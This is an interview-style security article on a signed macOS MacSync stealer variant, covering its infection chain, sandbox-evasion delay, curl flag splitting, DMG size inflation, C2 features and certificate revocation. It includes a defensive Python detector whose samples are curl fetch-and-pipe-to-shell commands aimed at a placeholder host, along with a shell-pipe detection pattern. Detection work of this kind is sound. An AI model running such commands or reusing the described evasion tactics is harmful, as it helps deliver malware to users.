Signed macOS Malware Bypasses Apple’s Own Security

With the macOS threat landscape evolving at a breakneck pace, we sat down with Rupert Marais, our in-house security specialist, to dissect a new and particularly deceptive malware strain. This new variant of the MacSync stealer highlights a worrying trend where attackers are successfully using Apple’s own trust mechanisms against it. In our discussion, Rupert unpacks the malware’s contradictory infection process, details its clever evasion techniques, and explains the broader strategic implications of its command-and-control capabilities. He also sheds light on the perpetual cat-and-mouse game between Apple and cybercriminals over code-signing certificates.

The article states this MacSync variant used a signed, notarized app to bypass Gatekeeper but still prompted users to right-click and open it. Could you explain this apparent contradiction and walk us through the step-by-step process of how this particular malware gets from the DMG to execution?

It’s a fascinating bit of psychological manipulation layered on top of a technical bypass. On the surface, it seems redundant. The whole point of getting an app signed and notarized by Apple is to have it run seamlessly without Gatekeeper raising an alarm. But by still including the “right-click to open” instruction—a classic workaround for unsigned apps—the attackers are playing a dual game. It acts as a fallback and, more insidiously, it normalizes suspicious user behavior. The process begins when a user downloads the disk image, named something like “zk-call-messenger-installer-3.9.2-lts.dmg.” Inside is the notarized app, which the Swift-based dropper then executes. From there, it gets patient. It checks for an internet connection, then deliberately waits for about 3600 seconds—an hour—to outlast many automated sandbox analysis environments. After its wait, it strips the file’s quarantine attributes and uses a specially crafted command to fetch and execute the final, encoded MacSync payload.

Researchers noted unique evasion tactics, like changing curl command flags and inflating the DMG file size to 25.5 MB with PDFs. Based on your experience, how do these specific changes help evade detection, and can you provide other examples of clever evasion techniques you’re seeing?

These tactics are all about avoiding automated security systems by breaking established patterns. Security software often hunts for signatures, and the curl -fsSL command is a textbook indicator for downloading and running a malicious script. By splitting the flags into -fL and -sS and adding other options, the attackers make the command look just different enough to slide past simplistic signature-based detection. It’s subtle, but effective. The file inflation technique is even more low-tech but brilliant in its own way. Many automated analysis tools have file size limits to manage resources. A tiny, suspicious installer gets immediate scrutiny. But a 25.5 MB file bloated with unrelated PDFs seems more like a legitimate, albeit poorly packaged, application. This can cause scanners to either time out or skip it entirely. We’re seeing this philosophy elsewhere; for instance, attackers behind the Odyssey stealer have been wrapping their malware in signed DMGs that impersonate well-known software like Google Meet, leveraging brand trust as another layer of evasion.
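The flag-splitting evasion described above is only effective against rules that match the literal string "curl -fsSL". The added example below (not from the article or any vendor product) shows the defender's counter: parse the curl invocation, reduce its options to a canonical set of single-letter flags, and match on the set, so -fsSL, -fL -sS, and --fail --silent --show-error --location all collapse to the same signature. It also flags the pipe-into-shell stage that makes the pattern dangerous. The option tables are real curl options but deliberately partial; the command lines are constructed samples.

```python
"""Canonicalise curl invocations so flag grouping (-fsSL vs -fL -sS) cannot
defeat a detection rule. Added example; all sample commands are constructed."""
import re
import shlex

# Single-letter curl options that consume a value (real options, partial list),
# needed so that "-o file" does not have its value mistaken for more flags.
SHORT_WITH_ARG = set("oHXduAexKTwmbcEFrUyYz")

# Long-form spellings mapped to their short letter (real curl options).
LONG_TO_SHORT = {
    "--fail": "f", "--silent": "s", "--show-error": "S", "--location": "L",
    "--output": "o", "--header": "H", "--request": "X", "--data": "d",
}
# Long options that consume a value and have no entry above (real, partial).
LONG_WITH_ARG = {"--retry", "--connect-timeout", "--max-time", "--user-agent", "--url"}

# The textbook "fail quietly, follow redirects" download pattern as a flag set.
SILENT_FETCH = {"f", "s", "S", "L"}


def curl_flags(cmd: str) -> set[str]:
    """Return the single-letter curl flags in use, whatever their grouping."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return set()
    # Accept "curl" or any path ending in /curl as the command.
    if not argv or argv[0].rsplit("/", 1)[-1] != "curl":
        return set()
    flags: set[str] = set()
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok in ("|", "&&", ";"):
            break  # end of the curl stage of the pipeline
        if tok.startswith("--"):
            name, sep, _ = tok.partition("=")
            if name in LONG_TO_SHORT:
                flags.add(LONG_TO_SHORT[name])
                if LONG_TO_SHORT[name] in SHORT_WITH_ARG and not sep:
                    i += 1  # value is the next word
            elif name in LONG_WITH_ARG and not sep:
                i += 1
        elif tok.startswith("-") and len(tok) > 1:
            # A cluster such as -fsSL; stop at the first option that takes a value,
            # whose argument is either the rest of the cluster or the next word.
            for pos, ch in enumerate(tok[1:]):
                flags.add(ch)
                if ch in SHORT_WITH_ARG:
                    if pos == len(tok) - 2:
                        i += 1
                    break
        i += 1
    return flags


def pipes_to_shell(cmd: str) -> bool:
    """True when the command's output is piped into a shell interpreter."""
    return re.search(r"\|\s*(?:sudo\s+)?(?:/bin/)?(?:ba|z|k)?sh\b", cmd) is not None


def classify(cmd: str) -> str:
    """Label a command line by flag set rather than by literal string match."""
    flags = curl_flags(cmd)
    if SILENT_FETCH <= flags and pipes_to_shell(cmd):
        return "silent-fetch-and-execute"
    if SILENT_FETCH <= flags:
        return "silent-fetch"
    return "benign"


# Constructed sample command lines; example.invalid is a reserved, non-routable name.
SAMPLES = [
    "curl -fsSL https://example.invalid/install.sh | sh",                  # textbook form
    "curl -fL --retry 3 -sS https://example.invalid/install.sh | bash",    # split flags
    "curl --fail --silent --show-error --location https://example.invalid/x | /bin/zsh",
    "curl -o /tmp/report.pdf https://example.invalid/report.pdf",          # ordinary download
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{classify(sample):26s} {sorted(curl_flags(sample))}  {sample}")
```

The same idea applies to any tool whose options can be grouped or spelled two ways: match on the parsed, canonical form, never on the bytes the attacker chose to type.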

The payload is identified as MacSync, a Go-based agent with command-and-control capabilities. Beyond simple data theft, could you elaborate on the specific C2 functions this agent enables and how its capabilities compare to other macOS stealers like Odyssey or DigitStealer?

This is what truly elevates MacSync from a simple pest to a strategic threat. A standard information stealer, like many we see, is essentially a smash-and-grab tool. It gets in, collects credentials, browser data, or crypto wallets, sends the data home, and its job is mostly done. But MacSync is described as a “fully-featured Go-based agent” with remote command-and-control, or C2, capabilities. This changes the entire dynamic. Instead of a one-time data heist, the attackers establish a persistent foothold on the victim’s Mac. Imagine a thief who not only steals your wallet but also leaves behind a hidden microphone and a key to your front door. The C2 server allows them to send new commands, deploy additional malware, spy on the user in real-time, or use the infected machine as a pivot point to attack other systems on the network. This makes it far more dangerous and versatile than stealers like Odyssey or DigitStealer, which are typically focused on the initial data grab.

This attack is part of a trend where attackers use signed executables, but Apple quickly revoked the certificate. Can you describe the typical cat-and-mouse game between threat actors obtaining these certificates and Apple revoking them? How much of a setback is a single revocation for a campaign?

It’s a relentless cycle, and one of the central battlegrounds for macOS security. Threat actors go to great lengths to obtain Apple developer certificates, either by creating fraudulent developer accounts or by compromising legitimate ones. With that certificate, they can sign their malware, giving it a stamp of legitimacy that allows it to bypass Gatekeeper. For a while, their campaign runs smoothly. But eventually, security researchers or Apple’s internal systems will flag the signed application as malicious. Once confirmed, Apple revokes the certificate. A revocation is a sharp, immediate blow to that specific malware variant. The installer is effectively dead in the water; Gatekeeper will block it on sight. However, for a sophisticated attacker, it’s merely an operational cost. They likely have other certificates ready to go or are already in the process of acquiring new ones. It forces them to re-tool and re-deploy, but it rarely stops the overall campaign.

Do you have any advice for our readers?

Absolutely. The most critical lesson from this MacSync variant is that a developer signature or notarization is not an infallible mark of safety. Threat actors are actively abusing this trust system. Therefore, maintain a healthy dose of skepticism. If you download an application and it asks you to perform unusual steps to run it, like right-clicking and selecting “Open” from the menu, stop immediately. That is a massive red flag. Legitimate, properly signed software should not require such workarounds. Stick to downloading applications from the official Mac App Store or directly from the developer’s verified website. The fact that this malware even exists proves that relying solely on built-in protections isn’t enough. A layered defense, including a reputable third-party endpoint security solution, is essential for catching what slips through the cracks.
